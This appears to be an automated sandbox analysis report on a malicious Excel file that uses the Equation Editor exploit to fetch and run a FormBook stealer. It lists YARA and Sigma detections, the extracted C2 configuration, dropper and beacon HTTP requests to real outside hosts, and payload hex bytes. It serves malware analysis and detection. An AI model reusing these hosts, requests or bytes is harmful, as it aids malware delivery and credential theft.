5.0.vbc.exe.400000.6.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
4.2.vbc.exe.2f90000.4.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.vbc.exe.2f90000.4.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.vbc.exe.2f90000.4.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
4.2.vbc.exe.2f90000.4.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.vbc.exe.2f90000.4.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.vbc.exe.2f90000.4.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
5.0.vbc.exe.400000.7.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.vbc.exe.400000.7.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.vbc.exe.400000.7.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
5.1.vbc.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.1.vbc.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.1.vbc.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
5.2.vbc.exe.400000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.vbc.exe.400000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.vbc.exe.400000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
5.1.vbc.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.1.vbc.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.1.vbc.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
5.0.vbc.exe.400000.6.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.vbc.exe.400000.6.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
Click to see the 27 entries

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 103.232.53.25, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2580, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2580, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2580, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2856

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Jbx Signature Overview

• AV Detection
• Exploits
• Compliance
• Spreading
• Software Vulnerabilities
• Networking
• Key, Mouse, Clipboard, Microphone and Screen Capturing
• E-Banking Fraud
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Boot Survival
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection
• Stealing of Sensitive Information
• Remote Access Functionality

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.passionfruitny.com/ddzw/"], "decoy": ["azshalomcenter.com", "yumoo.design", "21pk.net", "zhauggim.xyz", "hoikhoinghiep.com", "1207rossmoyne.com", "izophoto.com", "spacex-live.net", "taskstudiox.com", "educationalsurprises.com", "5151vip16.com", "sarahannsartstudio.com", "indousmedicalscribing.com", "crossatlanticb.com", "codemnodum.com", "tvfret-america.online", "romualdoandrade.com", "creativeartsfilmacademy.club", "htsfrance.com", "bentonvilleartists.com", "reactivephysiorehab.com", "kencanatactical.com", "baycsolana.art", "komotoy.com", "metanetgateway.com", "daimondsofa.com", "cheese-box.online", "oeepa4a3bs.com", "consept-cafe.com", "thethomasgrouphomes.com", "marwatown.com", "daliborkamen.com", "taicholdingglobal.com", "palisadesstore.com", "adventuretravelsworld.com", "hamdykamal.net", "high-clicks3.com", "livebongdatv.com", "fiverrbetaa.xyz", "wardrobewish.com", "modsforcars.com", "schittstore.com", "toptanisimlik.com", "exteches.com", "kgkkristalljewels.com", "hpwdz.com", "talkaditown.com", "maininger.com", "preventgomohb.xyz", "juliamoranmartin.com", "flashpointyouth.com", "glenelg.store", "1courchevel.com", "snikido.com", "mikespotts.com", "memorylanecollections.com", "sportherd.com", "lesmariagesdesophie.com", "mammutphilippines.com", "shleppersmovingandstorage.com", "ervinowines.com", "kuwaitschoolsgame.com", "empiredigituseriness.com", "jyh8886.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: PO5594.xlsx	Virustotal: Detection: 32%			Perma Link
Source: PO5594.xlsx	ReversingLabs: Detection: 29%

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.2f90000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.2f90000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, type: MEMORY

Machine Learning detection for dropped file

Show sources

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Source: 5.0.vbc.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.NETSTAT.EXE.4119a0.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 5.0.vbc.exe.400000.4.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 5.2.vbc.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.1.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 5.0.vbc.exe.400000.0.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 5.0.vbc.exe.400000.3.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 5.0.vbc.exe.400000.6.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.vbc.exe.2f90000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.NETSTAT.EXE.27e796c.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 5.0.vbc.exe.400000.7.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.2.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 5.1.vbc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: netstat.pdb source: vbc.exe, 00000005.00000002.507848304.00000000004C9000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, NETSTAT.EXE

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405E93 FindFirstFileA,FindClose,
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00402671 FindFirstFileA,

Source: global traffic

DNS query: name: www.spacex-live.net

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop ebx
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 4x nop then pop ebx

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 103.232.53.25:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 103.232.53.25:80

Networking:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.spacex-live.net
Source: C:\Windows\explorer.exe	Domain query: www.schittstore.com
Source: C:\Windows\explorer.exe	Domain query: www.metanetgateway.com
Source: C:\Windows\explorer.exe	Network Connect: 66.29.132.90 80
Source: C:\Windows\explorer.exe	Network Connect: 104.21.75.173 80
Source: C:\Windows\explorer.exe	Network Connect: 75.2.60.5 80
Source: C:\Windows\explorer.exe	Network Connect: 162.241.253.231 80
Source: C:\Windows\explorer.exe	Domain query: www.sarahannsartstudio.com

Uses netstat to query active network connections and open ports

Show sources

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.passionfruitny.com/ddzw/

Source: Joe Sandbox View	ASN Name: AIMS-MY-NETAIMSDataCentreSdnBhdMY AIMS-MY-NETAIMSDataCentreSdnBhdMY
Source: Joe Sandbox View	ASN Name: ADVANTAGECOMUS ADVANTAGECOMUS

Source: global traffic	HTTP traffic detected: GET /ddzw/?h2Mdq=Z+FzwJtUDkwgABdyd+p8UeqxtpX8YY+y3UFx7cJDGSHChxct3TL8QRd2MFxOEFehDmKc8w==&_x=gVp0dvG0DtZT6do0 HTTP/1.1Host: www.spacex-live.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ddzw/?h2Mdq=eu2i37xABBm77RmOTVlK/UzsyDYSkffg03LYHul4MxZENkm7/tK6Jp9Y8VUWWe4q58P2rA==&_x=gVp0dvG0DtZT6do0 HTTP/1.1Host: www.schittstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ddzw/?h2Mdq=CC4eYJ6GdM3g7jV/74DGeVNO7dTe5083KAYqQjLLOiGFZCFwrjOGC7P0JmGnSxw4GGM5lA==&_x=gVp0dvG0DtZT6do0 HTTP/1.1Host: www.metanetgateway.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ddzw/?h2Mdq=iXrnxWa2MIQCLF3pcDg6+qoW1dWPNK8gD+C0AcHvSyjXkMlp/HpcZgrhMm+aOjdhifJKjg==&_x=gVp0dvG0DtZT6do0 HTTP/1.1Host: www.sarahannsartstudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Nov 2021 08:27:00 GMTServer: Apache/2.4.49 (Win64) OpenSSL/1.1.1l PHP/7.4.24Last-Modified: Tue, 02 Nov 2021 03:24:30 GMTETag: "47758-5cfc5d4e71e00"Accept-Ranges: bytesContent-Length: 292696Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d6 01 00 00 04 00 00 fb 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 74 00 00 a0 00 00 00 00 d0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 eb 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 b0 01 00 00 90 00 00 00 06 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 d0 02 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic

HTTP traffic detected: GET /8880/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.232.53.25Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
Source: unknown	TCP traffic detected without corresponding DNS query: 103.232.53.25
